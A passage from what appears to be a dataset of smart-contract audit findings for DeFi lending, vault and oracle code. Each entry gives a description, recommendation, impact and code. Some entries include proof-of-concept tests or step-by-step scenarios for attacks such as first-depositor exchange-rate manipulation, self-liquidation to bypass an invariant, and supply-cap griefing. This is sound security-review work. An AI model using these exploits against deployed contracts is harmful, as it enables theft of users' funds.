When a lender deposits to a bucket, they are vulnerable to pool LUP slippage which might cause them to lose funds due to fee charges against their will.\\nA lender would call `addQuoteToken()` to deposit. This function only allows entering expiration time for transaction settlement, but there is no slippage protection.\\n```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n\\nIn LenderActions.sol, `addQuoteToken()` takes current `DepositsState` in storage and current `poolState_.debt` in storage to calculate spot LUP prior to deposit. And this LUP is compared with user input bucket `index_` to determine if the lender will be punished with deposit fees. The deposit amount is then written to storage.\\n```\\n//LenderActions.sol\\n function addQuoteToken(\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n PoolState calldata poolState_,\\n AddQuoteParams calldata params_\\n ) external returns (uint256 bucketLP_, uint256 lup_) {\\n // rest of code\\n // charge unutilized deposit fee where appropriate\\n |> uint256 lupIndex = Deposits.findIndexOfSum(deposits_, poolState_.debt);\\n bool depositBelowLup = lupIndex != 0 && params_.index > lupIndex;\\n if (depositBelowLup) {\\n addedAmount = Maths.wmul(addedAmount, Maths.WAD - _depositFeeRate(poolState_.rate));\\n }\\n// rest of code\\n Deposits.unscaledAdd(deposits_, params_.index, unscaledAmount);\\n// rest of code\\n```\\n\\nIt should be noted that current `deposits_` and `poolState_.debt` can be different from when the user invoked the transaction, which will result in a different LUP spot price unforeseen by the lender to determine deposit fees. Even though lenders can input a reasonable expiration time `expirty_`, this will only prevent stale transactions to be executed and not offer any slippage control.\\nWhen there are many lenders depositing around the same time, LUP spot price can be increased and if the user transaction settles after a whale lender which moves the LUP spot price up significantly, the user might get accidentally punished for depositing below LUP. Or there could also be malicious lenders trying to ensure their transactions settle at a favorable LUP/HTP and front-run the user transaction, in which case the user transaction might still settle after the malicious lender and potentially get charged for fees.","Add slippage protection in Pool.sol `addQuoteToken()`. A lender can enable slippage protection, which will enable comparing deposit `index_` with `lupIndex` in LenderActions.sol.","Lenders might get charged deposit fees due to slippage against their will with or without MEV attacks, lenders might also lose on interest by depositing below HTP.","```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n" +BalancedVault.sol: loss of funds + global settlement flywheel / user settlement flywheels getting out of sync,high,"When an epoch has become ""stale"", the `BalancedVault` will treat any new deposits and redemptions in this epoch as ""pending"". This means they won't get processed by the global settlement flywheel in the next epoch but one epoch later than that.\\nDue to the fact that anyone can push a pending deposit or redemption of a user further ahead by making an arbitrarily small deposit in the ""intermediate epoch"" (i.e. the epoch between when the user creates the pending deposit / redemption and the epoch when it is scheduled to be processed by the global settlement flywheel), the user can experience a DOS.\\nWorse than that, by pushing the pending deposit / pending redemption further ahead, the global settlement flywheel and the user settlement flywheel get out of sync.\\nAlso users can experience a loss of funds.\\nSo far so good. The global settlement flywheel and the user settlement flywheel are in sync and will process the pending deposit in epoch `3`.\\nNow here's the issue. A malicious user2 or user1 unknowingly (depending on the specific scenario) calls `deposit` for user1 again in the current epoch `2` once it has become `stale` (it's possible to `deposit` an arbitrarily small amount). By doing so we set `_pendingEpochs[user1] = context.epoch + 1 = 3`, thereby pushing the processing of the `deposit` in the user settlement flywheel one epoch ahead.\\nIt's important to understand that the initial deposit will still be processed in epoch `3` in the global settlement flywheel, it's just being pushed ahead in the user settlement flywheel.\\nThereby the global settlement flywheel and user settlement flywheel are out of sync now.\\nAn example for a loss of funds that can occur as a result of this issue is when the PnL from epoch `3` to epoch `4` is positive. Thereby the user1 will get less shares than he is entitled to.\\nSimilarly it is possible to push pending redemptions ahead, thereby the `_totalUnclaimed` amount would be increased by an amount that is different from the amount that `_unclaimed[account]` is increased by.\\nComing back to the case with the pending deposit, I wrote a test that you can add to BalancedVaultMulti.test.ts:\\n```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n\\nThe impact that is generated by having one pending deposit that is off by one epoch is small. However over time this would evolve into a chaotic situation, where the state of the Vault is significantly corrupted.",My recommendation is to implement a queue for pending deposits / pending redemptions of a user. Pending deposits / redemptions can then be processed independently (without new pending deposits / redemptions affecting when existing ones are processed).\\nPossibly there is a simpler solution which might involve restricting the ability to make deposits to the user himself and only allowing one pending deposit / redemption to exist at a time.\\nThe solution to implement depends on how flexible the sponsor wants the deposit / redemption functionality to be.,"The biggest impact comes from the global settlement flywheel and user settlement flywheel getting out of sync. As shown above, this can lead to a direct loss of funds for the user (e.g. the amount of shares he gets for a deposit are calculated with the wrong context).\\nApart from the direct impact for a single user, there is a subtler impact which can be more severe in the long term. Important invariants are violated:\\nSum of user balances is equal to the total supply\\nSum of unclaimed user assets is equal to total unclaimed assets\\nThereby the impact is not limited to a single user but affects the calculations for all users.\\nLess important but still noteworthy is that users that deposit into the Vault are partially exposed to PnL in the underlying products. The Vault does not employ a fully delta-neutral strategy. Therefore by experiencing a larger delay until the pending deposit / redemption is processed, users incur the risk of negative PnL.","```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n" +ChainlinkAggregator: binary search for roundId does not work correctly and Oracle can even end up temporarily DOSed,medium,"When a phase switchover occurs, it can be necessary that phases need to be searched for a `roundId` with a timestamp as close as possible but bigger than `targetTimestamp`.\\nFinding the `roundId` with the closest possible timestamp is necessary according to the sponsor to minimize the delay of position changes:\\n\\nThe binary search algorithm is not able to find this best `roundId` which thereby causes unintended position changes.\\nAlso it can occur that the `ChainlinkAggregator` library is unable to find a valid `roundId` at all (as opposed to only not finding the ""best"").\\nThis would cause the Oracle to be temporarily DOSed until there are more valid rounds.\\nLet's say in a phase there's only one valid round (roundId=1) and the timestamp for this round is greater than `targetTimestamp`\\nWe would expect the `roundId` that the binary search finds to be `roundId=1`.\\nThe binary search loop is executed with `minRoundId=1` and `maxRoundId=1001`.\\nAll the above conditions can easily occur in reality, they represent the basic scenario under which this algorithm executes.\\n`minRoundId` and `maxRoundId` change like this in the iterations of the loop:\\n```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n\\nSince we assumed that `roundId=2` is invalid, the function returns `0` (maxTimestamp=type(uint256).max):\\nIn the case that `latestRound.roundId` is equal to the `roundId=1` (i.e. same phase and same round id which could not be found) there would be no other valid rounds that the `ChainlinkAggregator` can find which causes a temporary DOS.","I recommend to add a check if `minRoundId` is a valid solution for the binary search. If it is, `minRoundId` should be used to return the result instead of maxRoundId:\\n```\\n // If the found timestamp is not greater than target timestamp or no max was found, then the desired round does\\n // not exist in this phase\\n// Remove the line below\\n if (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max) return 0;\\n// Add the line below\\n if ((minTimestamp <= targetTimestamp || minTimestamp == type(uint256).max) && (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max)) return 0;\\n \\n// Add the line below\\n if (minTimestamp > targetTimestamp) {\\n// Add the line below\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(minRoundId));\\n// Add the line below\\n }\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(maxRoundId));\\n }\\n```\\n\\nAfter applying the changes, the binary search only returns `0` if both `minRoundId` and `maxRoundId` are not a valid result.\\nIf this line is passed we know that either of both is valid and we can use `minRoundId` if it is the better result.","As explained above this would result in sub-optimal and unintended position changes in the best case. In the worst-case the Oracle can be temporarily DOSed, unable to find a valid `roundId`.\\nThis means that users cannot interact with the perennial protocol because the Oracle cannot be synced. So they cannot close losing trades which is a loss of funds.",```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n +BalancedVault.sol: Early depositor can manipulate exchange rate and steal funds,medium,"The first depositor can mint a very small number of shares, then donate assets to the Vault. Thereby he manipulates the exchange rate and later depositors lose funds due to rounding down in the number of shares they receive.\\nThe currently deployed Vaults already hold funds and will merely be upgraded to V2. However as Perennial expands there will surely be the need for more Vaults which enables this issue to occur.\\nYou can add the following test to `BalancedVaultMulti.test.ts`. Make sure to have the `dsu` variable available in the test since by default this variable is not exposed to the tests.\\nThe test is self-explanatory and contains the necessary comments:\\n```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\n",This issue can be mitigated by requiring a minimum deposit of assets. Thereby the attacker cannot manipulate the exchange rate to be so low as to enable this attack.,The attacker can steal funds from later depositors.,"```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\n" +User would liquidate his account to sidestep `takerInvariant` modifier,medium,"A single user could open a massive maker position, using the maximum leverage possible(and possibly reach the maker limit), and when a lot of takers open take positions, maker would liquidate his position, effectively bypassing the taker invariant and losing nothing apart from position fees. This would cause takers to be charged extremely high funding fees(at the maxRate), and takers that are not actively monitoring their positions will be greatly affected.\\nIn the closeMakeFor function, there is a modifier called `takerInvariant`.\\n```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n\\nThis modifier prevents makers from closing their positions if it would make the global maker open positions to fall below the global taker open positions. A malicious maker can easily sidestep this by liquidating his own account. Liquidating an account pays the liquidator a fee from the account's collateral, and then forcefully closes all open maker and taker positions for that account.\\n```\\nfunction closeAll(address account) external onlyCollateral notClosed settleForAccount(account) {\\n AccountPosition storage accountPosition = _positions[account];\\n Position memory p = accountPosition.position.next(_positions[account].pre);\\n\\n // Close all positions\\n _closeMake(account, p.maker);\\n _closeTake(account, p.taker);\\n\\n // Mark liquidation to lock position\\n accountPosition.liquidation = true; \\n }\\n```\\n\\nThis would make the open maker positions to drop significantly below the open taker position, and greatly increase the funding fee and utilization ratio.\\nATTACK SCENARIO\\nA new Product(ETH-Long) is launched on arbitrum with the following configurations:\\n20x max leverage(5% maintenance)\\nmakerFee = 0\\ntakerFee = 0.015\\nliquidationFee = 20%\\nminRate = 4%\\nmaxRate = 120%\\ntargetRate = 12%\\ntargetUtilization = 80%\\nmakerLimit = 4000 Eth\\nETH price = 1750 USD\\nColl Token = USDC\\nmax liquidity(USD) = 4000*1750 = $7,000,000\\nWhale initially supplies 350k USDC of collateral(~200ETH), and opens a maker position of 3000ETH($5.25mn), at 15x leverage.\\nAfter 2 weeks of activity, global open maker position goes up to 3429ETH($6mn), and because fundingFee is low, people are incentivized to open taker positions, so global open taker position gets to 2743ETH($4.8mn) at 80% utilization. Now, rate of fundingFee is 12%\\nNow, Whale should only be able to close up to 686ETH($1.2mn) of his maker position using the `closeMakeFor` function because of the `takerInvariant` modifier.\\nWhale decides to withdraw 87.5k USDC(~50ETH), bringing his total collateral to 262.5k USDC, and his leverage to 20x(which is the max leverage)\\nIf price of ETH temporarily goes up to 1755 USD, totalMaintenance=3000 * 1755 * 5% = $263250. Because his totalCollateral is 262500 USDC(which is less than totalMaintenance), his account becomes liquidatable.\\nWhale liquidates his account, he receives liquidationFee*totalMaintenance = 20% * 263250 = 52650USDC, and his maker position of 3000ETH gets closed. Now, he can withdraw his remaining collateral(262500-52650=209850)USDC because he has no open positions.\\nGlobal taker position is now 2743ETH($4.8mn), and global maker position is 429ETH($750k)\\nWhale has succeeded in bypassing the takerInvaraiant modifier, which was to prevent him from closing his maker position if it would make global maker position less than global taker position.\\nConsequently,\\nFunding fees would now be very high(120%), so the currently open taker positions will be greatly penalized, and takers who are not actively monitoring their position could lose a lot.\\nWhale would want to gain from the high funding fees, so he would open a maker position that would still keep the global maker position less than the global taker position(e.g. collateral of 232750USDC at 15x leverage, open position = ~2000ETH($3.5mn)) so that taker positions will keep getting charged at the funding fee maxRate.","Consider implementing any of these:\\nProtocol should receive a share of liquidation fee: This would disincentivize users from wanting to liquidate their own accounts, and they would want to keep their positions healthy and over-collateralized\\nLet there be a maker limit on each account: In addition to the global maker limit, there should be maker limit for each account which may be capped at 5% of global maker limit. This would decentralize liquidity provisioning.","Issue User would liquidate his account to sidestep `takerInvariant` modifier\\nUser will close his maker position when he shouldn't be allowed to, and it would cause open taker positions to be greatly impacted. And those who are not actively monitoring their open taker positions will suffer loss due to high funding fees.","```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n" +Accounts will not be liquidated when they are meant to.,medium,"In the case that the totalMaintenance*liquidationFee is higher than the account's totalCollateral, liquidators are paid the totalCollateral. I think one of the reasons for this is to avoid the case where liquidating an account would attempt to debit fees that is greater than the collateral balance The problem is that, the value of totalCollateral used as fee is slightly higher value than the current collateral balance, which means that in such cases, attempts to liquidate the account would revert due to underflow errors.\\nHere is the `liquidate` function:\\n```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, msg.sender, fee);\\n }\\n```\\n\\n`fee=min(totalCollateral,collateralForFee*liquidationFee)` But the PROBLEM is, the value of `totalCollateral` is fetched before calling `product.closeAll`, and `product.closeAll` debits the closePosition fee from the collateral balance. So there is an attempt to debit `totalCollateral`, when the current collateral balance of the account is totalCollateral-closePositionFees This allows the following:\\nThere is an ETH-long market with following configs:\\nmaintenance=5%\\nminCollateral=100USDC\\nliquidationFee=20%\\nETH price=$1000\\nUser uses 500USDC to open $10000(10ETH) position\\nPrice of ETH spikes up to $6000\\nRequired maintenance= 60000*5%=$3000 which is higher than account's collateral balance(500USDC), therefore account should be liquidated\\nA watcher attempts to liquidate the account which does the following:\\ntotalCollateral=500USDC\\n`product.closeAll` closes the position and debits a makerFee of 10USDC\\ncurrent collateral balance=490USDC\\ncollateralForFee=totalMaintenance=$3000\\nfee=min(500,3000*20%)=500\\n`_products[product].debitAccount(account,fee)` attempts to subtract 500 from 490 which would revert due to underflow\\naccount does not get liquidated\\nNow, User is not liquidated even when he is using 500USD to control a $60000 position at 120x leverage(whereas, maxLeverage=20x)\\nNOTE: This would happen when the market token's price increases by (1/liquidationFee)x. In the above example, price of ETH increased by 6x (from 1000USD to 6000USD) which is greater than 5(1/20%)",`totalCollateral` that would be paid to liquidator should be refetched after `product.closeAll` is called to get the current collateral balance after closePositionFees have been debited.,"A User's position will not be liquidated even when his collateral balance falls WELL below the required maintenance. I believe this is of HIGH impact because this scenario is very likely to happen, and when it does, the protocol will be greatly affected because a lot of users will be trading abnormally high leveraged positions without getting liquidated.","```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, msg.sender, fee);\\n }\\n```\\n" +`BalancedVault` doesn't consider potential break in one of the markets,medium,"In case of critical failure of any of the underlying markets, making it permanently impossible to close position and withdraw collateral all funds deposited to balanced Vault will be lost, including funds deposited to other markets.\\nAs Markets and Vaults on Perennial are intented to be created in a permissionless manner and integrate with external price feeds, it cannot be ruled out that any Market will enter a state of catastrophic failure at a point in the future (i.e. oracle used stops functioning and Market admin keys are compromised, so it cannot be changed), resulting in permanent inability to process closing positions and withdrawing collateral.\\n`BalancedVault` does not consider this case, exposing all funds deposited to a multi-market Vault to an increased risk, as it is not implementing a possibility for users to withdraw deposited funds through a partial emergency withdrawal from other markets, even at a price of losing the claim to locked funds in case it becomes available in the future. This risk is not mentioned in the documentation.\\nProof of Concept\\nConsider a Vault with 2 markets: ETH/USD and ARB/USD.\\nAlice deposits to Vault, her funds are split between 2 markets\\nARB/USD market undergoes a fatal failure resulting in `maxAmount` returned from `_maxRedeemAtEpoch` to be 0\\nAlice cannot start withdrawal process as this line in `redeem` reverts:\\n```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\n",Implement a partial/emergency withdrawal or acknowledge the risk clearly in Vault's documentation.,Users funds are exposed to increased risk compared to depositing to each market individually and in case of failure of any of the markets all funds are lost. User has no possibility to consciously cut losses and withdraw funds from Markets other than the failed one.,"```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\n" +eMode implementation is completely broken,high,"Enabling eMode allows assets of the same class to be borrowed at much higher a much higher LTV. The issue is that the current implementation makes the incorrect calls to the Aave V3 pool making so that the pool can never take advantage of this higher LTV.\\nAaveLeverageStrategyExtension.sol#L1095-L1109\\n```\\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n \\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n```\\n\\nWhen calculating the max borrow/repay allowed, the contract uses the getReserveConfigurationData subcall to the pool.\\nAaveProtocolDataProvider.sol#L77-L100\\n```\\nfunction getReserveConfigurationData(\\n address asset\\n)\\n external\\n view\\n override\\n returns (\\n // rest of code\\n )\\n{\\n DataTypes.ReserveConfigurationMap memory configuration = IPool(ADDRESSES_PROVIDER.getPool())\\n .getConfiguration(asset);\\n\\n (ltv, liquidationThreshold, liquidationBonus, decimals, reserveFactor, ) = configuration\\n .getParams();\\n```\\n\\nThe issue with using getReserveConfigurationData is that it always returns the default settings of the pool. It never returns the adjusted eMode settings. This means that no matter the eMode status of the set token, it will never be able to borrow to that limit due to calling the incorrect function.\\nIt is also worth considering that the set token as well as other integrated modules configurations/settings would assume this higher LTV. Due to this mismatch, the set token would almost guaranteed be misconfigured which would lead to highly dangerous/erratic behavior from both the set and it's integrated modules. Due to this I believe that a high severity is appropriate.",Pull the adjusted eMode settings rather than the base pool settings,"Usage of eMode, a core function of the contracts, is completely unusable causing erratic/dangerous behavior","```\\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n \\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n```\\n" +_calculateMaxBorrowCollateral calculates repay incorrectly and can lead to set token liquidation,high,"When calculating the amount to repay, `_calculateMaxBorrowCollateral` incorrectly applies `unutilizedLeveragePercentage` when calculating `netRepayLimit`. The result is that if the `borrowValue` ever exceeds `liquidationThreshold * (1 - unutilizedLeveragPercentage)` then all attempts to repay will revert.\\nAaveLeverageStrategyExtension.sol#L1110-L1118\\n```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n\\nWhen calculating `netRepayLimit`, `_calculateMaxBorrowCollateral` uses the `liquidationThreshold` adjusted by `unutilizedLeveragePercentage`. It then subtracts the borrow value from this limit. This is problematic because if the current `borrowValue` of the set token exceeds `liquidationThreshold` * (1 - unutilizedLeveragPercentage) then this line will revert making it impossible to make any kind of repayment. Once no repayment is possible the set token can't rebalance and will be liquidated.",Don't adjust the max value by `unutilizedLeveragPercentage`,Once the leverage exceeds a certain point the set token can no longer rebalance,```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n +setIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at Aave,medium,"setIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at Aave\\nrebalance implement a cap of tradeSize and if the need to rebalance require taking more assets than the maxTradeSize, then `twapLeverageRatio` would be set to the targeted leverage. `twapLeverageRatio` == 0 is required during rebalance.\\nConsider:\\nlever is needed during rebalance, the strategy require to borrow more ETH and sell to wstETH during the 1st call of rebalance the protocol cache the new `twapLeverageRatio` However wstETH market in Aave reach supply cap. rebalance/iterateRebalance comes to a halt. `twapLeverageRatio` remains caching the targeted leverage\\nsetIncentiveSettings requires a condition in which no rebalance is in progress. With the above case, setIncentiveSettings can be halted for an extended period of time until the wstETH market falls under supply cap.\\nWorth-noting, at the time of writing this issue, the wstETH market at Aave has been at supply cap\\nIn this case, malicious actor who already has a position in wstETH can do the following:\\ndeposit into the setToken, trigger a rebalance.\\nmalicious trader withdraw his/her position in Aave wstETH market so there opens up vacancy for supply again.\\nprotocol owner see supply vacancy, call rebalance in order to lever as required. Now twapLeverageRatio is set to new value since multiple trades are needed\\nmalicious trader now re-supply the wstETH market at Aave so it reaches supply cap again.\\nthe protocol gets stuck with a non-zero twapLeverageRatio, `setIncentiveSettings` can not be called.\\n```\\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator 